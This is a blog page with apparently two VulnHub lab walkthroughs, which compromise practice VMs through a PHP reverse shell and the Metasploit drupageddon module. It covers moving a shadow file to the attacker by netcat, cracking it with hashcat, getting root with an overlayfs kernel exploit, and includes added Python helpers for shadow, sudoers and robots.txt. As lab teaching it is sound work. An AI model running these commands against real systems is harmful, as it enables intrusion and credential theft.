<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/exploit-01_zps2sgxdte3.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/exploit-01_zps2sgxdte3.png" height="332" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/expl-02_zpsplvia9qp.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/expl-02_zpsplvia9qp.png" height="115" width="400" /></a></div>
<br />
<i>And we're in :)</i><br />
<br />
or manually create shell.php, upload, start listener and open php file in browser;<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/php-bull_zpspyijfh7g.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/php-bull_zpspyijfh7g.png" height="144" width="640" /></a></div>
<div>
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/upload-01_zps8ebntwut.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/upload-01_zps8ebntwut.png" height="545" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/shell-01_zpsolwntnrf.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/shell-01_zpsolwntnrf.png" height="153" width="400" /></a></div>
<br />
<br />
<br />
<br />
<i>And again, we're in :D</i><br />
<br />
<br />
<br />
<br />
<br />
Spawning terminal with ;<br />
<span style="color: lime;">python -c 'import pty; pty.spawn("/bin/bash")'</span><br />
<br />
Usually my feeling is simply: don't over-complicate things if a solution is readily available; use it for quick access. Metasploit is great for quick and easy shells.<br />
On the other hand, I like having Plan Bs, Cs, Ds etc., so knowing how to do things another way is imperative and having a backup plan is always a must..<br />
<br />
<b>FLAGS YO!</b><br />
<b>==========</b><br />
So now we are in, let's see what a quick poke around can get us.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/shell-02_zpsy7tpepj8.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/shell-02_zpsy7tpepj8.png" height="544" width="640" /></a></div>
Awesome! A list of users and a flag along with a shadow backup file..<br />
and apparently *<i>My milkshake brings all the boys to the yard</i>*.. OK.. :D<br />
<br />
Let's get crackin' on the found users..<br />
I transfer the shadow file to the attacker with netcat;<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/nc-out_zpsz71omdml.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/nc-out_zpsz71omdml.png" height="184" width="640" /></a></div>
<br />
<br />
<br />
<br />
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/nc-in_zps5sg9sqpi.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/nc-in_zps5sg9sqpi.png" height="168" width="640" /></a><br />
<br />
I do a bit of stripping to make sure hashcat can understand the hash correctly, then run an attack using the best64 ruleset on a smallish wordlist;<br />
<span style="color: lime;">cat shadow.bak | egrep 'minotaur|heffer|h0rnbag|root' | cut -d : -f 2 > hashes.txt</span><br />
<span style="color: lime;">hashcat -a 0 -m 1800 hashes.txt -r /usr/share/hashcat/rules/best64.rule lists/password.lst </span><br />
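The egrep | cut stripping above is the manual version of a step worth having in code, so here is an added example (my own, not from the original post or from the VM) that parses shadow-format lines, recognises the crypt(3) prefix that decides the hashcat mode (1800 for the $6$ sha512crypt hashes on this box), keeps user:hash pairs so hashcat's --username option maps results back to accounts, and sets aside locked, disabled and empty-password accounts. The shadow text in it is constructed and the digests are placeholders, not real hashes.<br />

```python
"""Classify shadow entries before cracking or auditing them (added example).

The sample shadow content is constructed; its digests are placeholders.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

# crypt(3) prefix -> (algorithm name, hashcat mode number from hashcat's mode list).
CRYPT_PREFIXES = {
    "$6$": ("sha512crypt", 1800),
    "$5$": ("sha256crypt", 7400),
    "$1$": ("md5crypt", 500),
    "$2a$": ("bcrypt", 3200), "$2b$": ("bcrypt", 3200), "$2y$": ("bcrypt", 3200),
}
WEAK_ALGORITHMS = {"md5crypt", "descrypt"}   # too weak for password storage today


@dataclass
class ShadowEntry:
    user: str
    hash_field: str              # second shadow field, verbatim
    algorithm: Optional[str]     # None when no hash is present
    hashcat_mode: Optional[int]  # None when hashcat has no mode for it
    locked: bool                 # '!' prefix or '*': password login disabled
    empty: bool                  # empty field: login without a password


def classify_hash(field: str) -> Tuple[Optional[str], Optional[int], bool, bool]:
    """Return (algorithm, hashcat_mode, locked, empty) for one password field."""
    if field == "":
        return None, None, False, True
    if field.lstrip("!") in ("", "*"):            # '*', '!', '!!', '!*' ...
        return None, None, True, False
    locked = field.startswith("!")                # '!$6$...' keeps the hash but disables it
    digest = field.lstrip("!")
    for prefix, (name, mode) in CRYPT_PREFIXES.items():
        if digest.startswith(prefix):
            return name, mode, locked, False
    if len(digest) == 13 and "$" not in digest:   # traditional DES crypt
        return "descrypt", 1500, locked, False
    return "unknown", None, locked, False


def parse_shadow(text: str) -> List[ShadowEntry]:
    """Parse shadow-format text: user:hash:lastchg:min:max:warn:inactive:expire:"""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue
        algorithm, mode, locked, empty = classify_hash(fields[1])
        entries.append(ShadowEntry(fields[0], fields[1], algorithm, mode, locked, empty))
    return entries


def crackable_hashes(text: str, users: Optional[Set[str]] = None) -> Dict[int, List[str]]:
    """Hashes a cracker can take, grouped by hashcat mode, as user:hash lines
    (run hashcat with --username so cracked results map back to accounts)."""
    grouped: Dict[int, List[str]] = {}
    for e in parse_shadow(text):
        if users is not None and e.user not in users:
            continue
        if e.locked or e.empty or e.hashcat_mode is None:
            continue
        grouped.setdefault(e.hashcat_mode, []).append(f"{e.user}:{e.hash_field}")
    return grouped


def audit_findings(text: str) -> Dict[str, List[str]]:
    """Defender's view: active accounts on weak algorithms, and accounts with no password."""
    entries = parse_shadow(text)
    return {
        "weak_algorithm": [e.user for e in entries if e.algorithm in WEAK_ALGORITHMS and not e.locked],
        "empty_password": [e.user for e in entries if e.empty],
    }


# Constructed sample; digests are placeholders and will not crack to anything.
SAMPLE_SHADOW = """\
root:$6$Zs7wq1Nt$CONSTRUCTED.root.digest.placeholder:16552:0:99999:7:::
minotaur:$6$kP2mXv9a$CONSTRUCTED.minotaur.digest.placeholder:16552:0:99999:7:::
heffer:$6$a9LqT4cw$CONSTRUCTED.heffer.digest.placeholder:16552:0:99999:7:::
h0rnbag:$6$Qe3nB8yd$CONSTRUCTED.h0rnbag.digest.placeholder:16552:0:99999:7:::
www-data:*:16552:0:99999:7:::
legacy:$1$x4Jd9wQ2$CONSTRUCTEDmd5placeholder:16552:0:99999:7:::
svc:!$6$Tr5vP0qk$CONSTRUCTED.svc.digest.placeholder:16552:0:99999:7:::
nopass::16552:0:99999:7:::
"""

if __name__ == "__main__":
    for mode, lines in crackable_hashes(SAMPLE_SHADOW).items():
        print(f"hashcat -m {mode} --username hashes-{mode}.txt  ({len(lines)} hashes)")
    print(audit_findings(SAMPLE_SHADOW))
```

Writing each group to its own file and running one hashcat job per mode is the equivalent of the cut command above; the audit_findings output is what the same parse gives you when you are the one administering the box rather than attacking it.<br />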
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crack-02_zpsfbwcsbk1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crack-02_zpsfbwcsbk1.png" height="320" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
heffer turns up a password pretty quickly; <b>Password1</b><br />
minotaur follows not too long after; <b>obiwan6</b><br />
root and h0rnbag remain elusive..<br />
<br />
<i>I like hashcat & cudaHashcat, but I have to give props to JohnTheRipper for the unix hashes: the above stripping and 'complicated' choosing of rulesets are not necessary with John, and the cracking process could also be done with a simple;</i><br />
<span style="color: lime;">john hashes.txt</span><br />
<br />
Let's switch user and see what else can be found with heffer's creds!<br />
<span style="color: lime;">su heffer</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/heffer-01_zps7lwirsof.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/heffer-01_zps7lwirsof.png" height="536" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Alright! heffer's flag obtained: <i>Th3 fl@g 15: m0000 y0</i><br />
<br />
Now let's switch users to minotaur and poke around a bit;<br />
<span style="color: lime;">su minotaur</span><br />
--> enter the retrieved password when prompted<br />
check out the home directory of user minotaur<br />
<span style="color: lime;">cd /home/minotaur</span><br />
<span style="color: lime;">ls -lah </span><br />
<span style="color: lime;">cat flag.txt</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/minotaur-01_zpslf5h7jt6.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/minotaur-01_zpslf5h7jt6.png" height="412" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Yep flag retrieved; <i>M355 W17H T3H 8ULL, G37 73H H0RN!</i><br />
<br />
Hmm.. a message taunting us whether we can find /root/flag.txt..<br />
The audacity! :D<br />
<br />
<span style="color: lime;">cat /root/flag.txt</span><br />
ah, no privs, well we kinda expected that..<br />
<br />
<br />
<b>r00t</b><br />
<b>===</b><br />
Two methods found for getting root;<br />
<br />
<u>1. overlayfs exploit;</u><br />
https://www.kernel-exploits.com/<br />
I downloaded the ofs_32 file and transferred it to the /tmp directory with netcat,<br />
then made the file executable with chmod and ran the exploit;<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/root-03_zpsnh6rc0fz.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/root-03_zpsnh6rc0fz.png" height="348" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
root baby !<br />
<br />
<u>2. administrative privileges </u><br />
So what privs do we actually have ?<br />
<br />
<span style="color: lime;">sudo -ll</span><br />
ahhh... I spy with my little eye.. something that rhymes with boot ;)<br />
<span style="color: lime;">sudo su</span><br />
Enter minotaur's password and we have the coveted hashtag instead of a dollar sign.. yup.. we have root privs!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/root_zpsfvvgkzta.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/root_zpsfvvgkzta.png" height="376" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
From here it's an easy road to the final flag.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/root-01_zpsubas2lon.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/root-01_zpsubas2lon.png" height="376" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<span style="color: lime;">cd /root</span><br />
<span style="color: lime;">cat flag.txt</span><br />
Final flag: <i>5urr0und3d bY @r$3h0l35</i><br />
<br />
<br />
Job Done !<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bender_zps7yf1npsd.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bender_zps7yf1npsd.gif" height="320" width="229" /></a></div>
<br />
<br />
<br />
It is mentioned that the users for which passwords were found were able to run /root/bullquote.sh as root.<br />
When root I had a look for the file without success; perhaps it's one of the mentioned red herrings, as that would possibly have been another way in.<br />
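Both root routes on this box come down to what sudo hands out: the `sudo -ll` listing that let minotaur run `sudo su`, and the /root/bullquote.sh grant mentioned in the VM description. As an added example (mine, not from the post, and the sudoers text in it is constructed rather than the VM's real file), here is a small audit of sudoers-style rules that flags the grants a reviewer should worry about: ALL, shells and su, pagers and editors that can drop to a shell, and custom scripts that need their existence, ownership and permissions checked. It only understands the common one-line rule form; alias and Defaults lines are skipped.<br />

```python
"""Flag sudoers grants that amount to root (added example; sample is constructed)."""
import os
import re
from typing import List, NamedTuple, Optional, Tuple

# user host=(runas[:group]) [TAG: ...] command, command
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<hosts>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$"
)
TAGS = ("NOPASSWD:", "PASSWD:", "NOEXEC:", "EXEC:", "SETENV:", "NOSETENV:",
        "LOG_INPUT:", "LOG_OUTPUT:")
SHELLS = {"sh", "bash", "dash", "zsh", "ksh", "su", "sudo"}      # direct root shell
INTERACTIVE = {"less", "more", "vi", "vim", "nano", "man"}        # have a shell escape


class Finding(NamedTuple):
    user: str
    command: str
    nopasswd: bool
    reason: str


def parse_rule(line: str) -> Optional[Tuple[str, str, bool, List[str]]]:
    """Return (user, runas, nopasswd, commands), or None for comments/Defaults/aliases."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith("Defaults") or line.split()[0].endswith("_Alias"):
        return None
    m = RULE_RE.match(line)
    if not m:
        return None
    rest = m.group("rest").strip()
    nopasswd = False
    changed = True
    while changed:                      # strip tag prefixes such as "NOPASSWD: SETENV: cmd"
        changed = False
        for tag in TAGS:
            if rest.startswith(tag):
                nopasswd = nopasswd or tag == "NOPASSWD:"
                rest = rest[len(tag):].strip()
                changed = True
    commands = [c.strip() for c in rest.split(",") if c.strip()]
    return m.group("user"), (m.group("runas") or "root"), nopasswd, commands


def audit_sudoers(text: str) -> List[Finding]:
    """Rules that let a user reach root (runas root or ALL) through a risky command."""
    findings: List[Finding] = []
    for line in text.splitlines():
        parsed = parse_rule(line)
        if parsed is None:
            continue
        user, runas, nopasswd, commands = parsed
        if runas.split(":")[0] not in ("root", "ALL"):
            continue                    # runs as an unprivileged user; not a root path
        for cmd in commands:
            prog = "ALL" if cmd == "ALL" else os.path.basename(cmd.split()[0])
            if cmd == "ALL":
                reason = "full root: any command"
            elif prog in SHELLS:
                reason = f"root shell via {prog}"
            elif prog in INTERACTIVE:
                reason = f"{prog} can spawn a shell from inside the program"
            elif cmd.startswith("/root/") or cmd.endswith(".sh"):
                reason = "custom script: verify it exists, is root-owned and not writable by the caller"
            else:
                continue
            findings.append(Finding(user, cmd, nopasswd, reason))
    return findings


# Constructed sample, not the VM's actual sudoers.
SAMPLE_SUDOERS = """\
Defaults        env_reset
Cmnd_Alias      BACKUP = /usr/bin/rsync
root            ALL=(ALL:ALL) ALL
%sudo           ALL=(ALL:ALL) ALL
minotaur        ALL=(ALL) ALL
heffer          ALL=(root) NOPASSWD: /root/bullquote.sh
h0rnbag         ALL=(root) /usr/bin/less /var/log/syslog
backup          ALL=(root) /usr/bin/rsync
www-data        ALL=(www-data) /bin/bash
"""

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        tag = "NOPASSWD " if f.nopasswd else ""
        print(f"{f.user:10} {tag}{f.command:40} {f.reason}")
```

On a real host feed it the output of `cat /etc/sudoers /etc/sudoers.d/*`; the rsync and www-data rules in the sample are there to show what does not get flagged.<br />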
<br />
<br />
Until I finally get h0rnbag's password I won't consider this VM totally busted..<br />
Considering the frequent use of leetspeak here, it's possible the password has some of that, as the O is replaced with a 0 in h0rnbag as well..<br />
<br />
If/When I crack it I will post it up ;)<br />
<br />
<br />
<br />
Thanks to Robert Winkel for the creation and to VulnHub for hosting these awesome VMs :D</div>
<b>VulnHub -- Droopy v0.2 -- Walkthrough</b> (posted 2016-04-23)<div dir="ltr" style="text-align: left;" trbidi="on">
The guys and gals at THS have been having a blast going through the VMs at vulnhub and the Droopy v0.2 proved no different.<br />
The lack of walkthroughs took away the ever-present temptation to go the easy way and made for a fun 'few' hours ;)<br />
<a href="https://www.vulnhub.com/entry/droopy-v02,143/" target="_blank">https://www.vulnhub.com/entry/droopy-v02,143/</a><br />
<div style="background-color: #f7f7f7; color: #606c75; font-family: open_sansregular; font-size: 14px; line-height: 20px; margin-bottom: 10px;">
There's 2 hints I would offer you:</div>
<div style="background-color: #f7f7f7; color: #606c75; font-family: open_sansregular; font-size: 14px; line-height: 20px; margin-bottom: 10px;">
1.) Grab a copy of the rockyou wordlist.</div>
<div style="background-color: #f7f7f7; color: #606c75; font-family: open_sansregular; font-size: 14px; line-height: 20px; margin-bottom: 10px;">
2.) It's fun to read other people's email.</div>
So from the hints, there is obviously some cracking to do, great ! We all love a good crack.<br />
<br />
So after firing up the VM, I checked for IPs with netdiscover.<br />
(well actually the screenshot is of a script which basically gets the local IP and then runs netdiscover based on that IP.. yup I'm lazy..)<br />
<br />
<span style="color: lime;">netdiscover -i eth0 -p -r 192.168.56.0/24</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ranger1_zpsknfdll2r.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ranger1_zpsknfdll2r.png" height="374" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
With the target's IP now in hand we run nmap on it (using zenmap here);<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/zenmap_zpsqodj2bom.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/zenmap_zpsqodj2bom.png" height="588" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
We find that port 80 is open, so we head over there to see that it requires a login.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/webpage_zpsd3gbx7jt.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/webpage_zpsd3gbx7jt.png" height="592" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
We further find that robots.txt has quite a few entries, some of which sound promising.<br />
So I check out the list from robots.txt, and then check which ones are accessible to us;<br />
<br />
<span style="color: lime;">curl -s 192.168.56.102/robots.txt | grep Disallow | sed 's/Disallow: //'</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/robots-txt_zpspdsidfrt.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/robots-txt_zpspdsidfrt.png" height="582" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Thought I would check which ones were accessible to us and move on from there, but actually ended up checking all of them anyway.. to no avail.. pff.. lol<br />
<span style="color: lime;">for i in $(curl -s 192.168.56.102/robots.txt | grep Disallow | sed 's/Disallow: //') ; \</span><br />
<span style="color: lime;">do RESULT=$(curl -s -I 192.168.56.102"$i" | grep "200 OK") ; echo -e "$i $RESULT\r" ; done</span><br />
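The curl loop above is a handy one-liner; as an added example (my own, not from the post) here is the same check written out in Python, which also copes with comments and duplicate entries in robots.txt and keeps paths with query strings intact. The point for whoever runs the site is the same one the loop makes: robots.txt is a list of suggestions to crawlers, so anything in it that still answers 200 is advertised, not protected. The robots.txt text and the server responses in the block are constructed; the HTTP check is passed in as a function so the logic runs offline, with a real HEAD-request fetcher provided for live use.<br />

```python
"""Which robots.txt Disallow paths are actually reachable? (added example)"""
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Optional
from urllib.parse import urljoin

StatusFetcher = Callable[[str], Optional[int]]


def disallowed_paths(robots_txt: str) -> List[str]:
    """Unique Disallow values, ignoring comments and empty Disallow lines."""
    paths: List[str] = []
    for raw in robots_txt.splitlines():
        line = raw.split("#", 1)[0].strip()
        key, _, value = line.partition(":")
        if key.strip().lower() != "disallow":
            continue
        value = value.strip()
        if value and value not in paths:      # bare 'Disallow:' means allow everything
            paths.append(value)
    return paths


def head_status(url: str, timeout: float = 5.0) -> Optional[int]:
    """HEAD request, like `curl -s -I`; returns the status code, or None if unreachable."""
    req = urllib.request.Request(url, method="HEAD")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:     # 4xx/5xx responses still carry a code
        return err.code
    except (urllib.error.URLError, OSError):
        return None


def check_disallowed(base_url: str, robots_txt: str,
                     fetch: StatusFetcher = head_status) -> Dict[str, Optional[int]]:
    """Map every Disallow path to the status code its URL returns."""
    return {path: fetch(urljoin(base_url, path)) for path in disallowed_paths(robots_txt)}


def exposed(results: Dict[str, Optional[int]]) -> List[str]:
    """Paths that answer 200: listed in robots.txt but served to anyone who asks."""
    return [path for path, status in results.items() if status == 200]


# Constructed robots.txt, loosely shaped like a Drupal one.
SAMPLE_ROBOTS = """\
# robots.txt (constructed sample)
User-agent: *
Crawl-delay: 10
Disallow: /includes/
Disallow: /scripts/
Disallow: /INSTALL.txt
Disallow: /?q=user/login   # login path with a query string
Disallow: /scripts/
Disallow:
"""

# Constructed responses standing in for a live server.
SAMPLE_RESPONSES = {
    "http://192.168.56.102/includes/": 403,
    "http://192.168.56.102/scripts/": 200,
    "http://192.168.56.102/INSTALL.txt": 200,
    "http://192.168.56.102/?q=user/login": 200,
}


def sample_fetch(url: str) -> Optional[int]:
    """Offline stand-in for head_status."""
    return SAMPLE_RESPONSES.get(url)


if __name__ == "__main__":
    results = check_disallowed("http://192.168.56.102", SAMPLE_ROBOTS, fetch=sample_fetch)
    for path, status in results.items():
        print(f"{str(status):>4}  {path}")
    print("exposed:", exposed(results))
```

Against a live host, call check_disallowed with the default fetcher (or fetch the robots.txt itself with urllib first); a 403 or 404 for a listed path is fine, a 200 is the finding.<br />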
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/curl-01_zps84luhfwe.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/curl-01_zps84luhfwe.png" height="270" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Seeing the login pages with /?= I thought maybe an SQL vulnerability which sqlmap may be able to help me with.. ran sqlmap on it, alas to no avail, booo :(<br />
<br />
After having gone through all that, I can't say I felt like I had found a great deal; however, a few things stood out: drupal and the login pages.<br />
<div>
It will be interesting to read how others use things such as the scripts found in the scripts directory, but my foo was too weak to use anything there to my advantage.</div>
<br />
I tried running hydra on the drupal login, thinking that this is possibly where the cracking comes into play! Negative, hydra did not play nice on the logins; even when finally overcoming the dreaded false positives, the progress always throttled/stopped.<br />
<br />
Found some drupal crackers online and gave them a whirl; alas, again to no avail. I was either trying incorrect usernames, or the password(s) were simply not in the usual quick wordlists, or the versions were incorrect.. you name it.. if any reader comes across any good ones, please leave a comment!<br />
<br />
But then during the searches for other cracking options, I read about a major drupal exploit..<br />
Firing up msfconsole gave me the skiddy wisdom I so desperately craved..<br />
<br />
<span style="color: lime;">service postgresql start</span><br />
<span style="color: lime;">msfconsole</span><br />
<span style="color: lime;">search drupal</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/msf-01_zpspcwx4wmu.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/msf-01_zpspcwx4wmu.png" height="372" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Let's check out what the 2014 drupageddon exploit, exploit/multi/http/drupal_drupageddon, has to offer!<br />
<br />
<span style="color: lime;">use exploit/multi/http/drupal_drupageddon</span><br />
<span style="color: lime;">show options</span><br />
<span style="color: lime;">set RHOST 192.168.56.102</span><br />
<span style="color: lime;">exploit</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/msf-02_zps9yqmkke8.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/msf-02_zps9yqmkke8.png" height="468" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
The stuff of dreams in this case.. I only needed to offer a host address to the metasploit overlord and I was presented with a meterpreter shell!<br />
Awesome! But no root.. so time to enumerate the bejeezus out of this thing..<br />
<br />
But first, one of the hints mentioned email, so I moseyed over to /var/mail/ to see what was happening over there and sure enough ;<br />
<span style="color: lime;">pwd</span><br />
<span style="color: lime;">ls /var/</span><br />
<span style="color: lime;">ls /var/mail/</span><br />
<span style="color: lime;">cat /var/mail/www-data</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/email_zps4qpoqi4d.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/email_zps4qpoqi4d.png" height="486" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<blockquote class="tr_bq">
<i> Subject: rockyou with a nice hat!<br />Message-ID:<br /> X-IMAP: 0080081351 0000002016<br />Status: NN<br />George,<br />I've updated the encrypted file... You didn't leave any<br />hints for me. The password isn't longer than 11 characters<br />and anyway, we know what academy we went to, don't you...?<br />I'm sure you'll figure it out it won't rockyou too much!<br />If you are still struggling, remember that song by The Jam<br />Later,<br />Dave</i></blockquote>
<i>NEWS!</i> An encrypted file lurks somewhere here.. what? where? why?!<br />
The hint at rockyou is quite obvious here, and there's also a mention of the probable passphrase size! Well, that could help cpu/gpu-starved VM citizens such as myself..<br />
Anyway, wtf are we looking for?!<br />
<br />
We need root access to fully investigate all directories.. and we still ain't got it..<br />
<br />
In come whispers from the THS crew.. <i>** &lt;whisper&gt;check for local exploits TAPE **&lt;/whisper&gt;</i><br />
Sounds like a solid plan; I should have done that before all the brute-force attempts and checking cron scripts which may be able to run at root level or gawd knows what.. damn.. *kicks self*<br />
<br />
So I go back to the enumeration idea again and use an enumeration script. I used a nice one I found online ( <a href="https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh">https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh</a> ), but g0tmi1k has a fantastic <a href="https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/" target="_blank">post on enumeration</a> which definitely should be in your favourites.<br />
<br />
<div>
